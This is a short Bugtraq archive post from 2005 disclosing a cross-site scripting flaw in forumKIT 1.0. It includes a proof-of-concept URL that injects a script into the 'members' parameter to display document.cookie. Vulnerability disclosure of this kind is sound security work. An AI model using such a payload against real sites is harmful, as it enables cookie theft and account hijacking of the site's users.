Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

XSS Vulnerability in ForumKIT

From: tom cruise <the.n3t () gmail com>
Date: 13 Jan 2005 11:17:00 -0000


Vulnerable System :
forumKIT 1.0

Description : 
an XSS is founded in the variable members that have the value 'true'
you can exchange it with XSS Code .

exploit : 
http://forum.target.com/f.aspx?members=";>&lt;script&gt;alert(document.cookie);&lt;/script&gt;

this exploit is discovered by : neO
e-mail : al_modamer () hotmail com
Previous By Date Next
Previous By Thread Next

Current thread: